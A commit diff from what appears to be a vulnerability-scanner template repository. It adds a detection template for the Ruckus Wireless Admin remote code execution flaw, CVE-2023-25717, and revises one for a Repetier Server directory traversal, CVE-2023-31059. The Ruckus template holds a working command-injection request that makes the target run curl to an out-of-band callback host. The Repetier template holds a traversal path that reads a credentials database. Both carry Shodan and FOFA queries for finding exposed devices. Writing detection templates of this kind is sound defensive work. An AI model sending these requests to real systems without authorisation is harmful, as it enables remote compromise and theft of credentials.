Merge pull request #7202 from parthmalhotra/cve

Create CVE-2023-25717.yaml
2023-05-17 01:48:30 +05:30 · 2023-05-17 01:48:30 +05:30 · 29a8d910d2
parent 8fa8d1dec3 bffcfa759b
commit 29a8d910d2
2 changed files with 47 additions and 3 deletions
--- a/http/cves/2023/CVE-2023-25717.yaml
+++ b/http/cves/2023/CVE-2023-25717.yaml
@ -0,0 +1,38 @@
+id: CVE-2023-25717
+
+info:
+  name: Ruckus Wireless Admin - Remote Code Execution
+  author: parthmalhotra,pdresearch
+  severity: critical
+  description: |
+    Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.
+  reference:
+    - https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/
+    - https://support.ruckuswireless.com/security_bulletins/315
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-25717
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-25717
+    cwe-id: CWE-94
+    epss-score: 0.00671
+    cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    verified: "true"
+    shodan-query: title:"ruckus wireless"
+    fofa-query: title="ruckus wireless"
+  tags: cve,cve2023,ruckus,rce
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(interactsh_protocol, 'http')
+          - contains_all(to_lower(interactsh_request), 'user-agent','curl')
+          - status_code_1 == 302
+        condition: and
--- a/http/cves/2023/CVE-2023-31059.yaml
+++ b/http/cves/2023/CVE-2023-31059.yaml
@ -1,8 +1,8 @@
 id: CVE-2023-31059

 info:
-  name: Repetier Server -  Directory Traversal
-  author: parthmalhotra, pdresearch
+  name: Repetier Server - Directory Traversal
+  author: parthmalhotra,pdresearch
  severity: high
  description: |
    Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.
@ -21,14 +21,20 @@ info:
    verified: "true"
    shodan-query: title:"Repetier-Server"
    fofa-query: title="Repetier-Server"
-  tags: cve,cve2023,oast,repetierserver
+  tags: cve,cve2023,repetier,lfi

 http:
  - method: GET
    path:
      - "{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"
+
+    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - 53514C69746520666F726D6174203300
+
+      - type: status
+        status:
+          - 200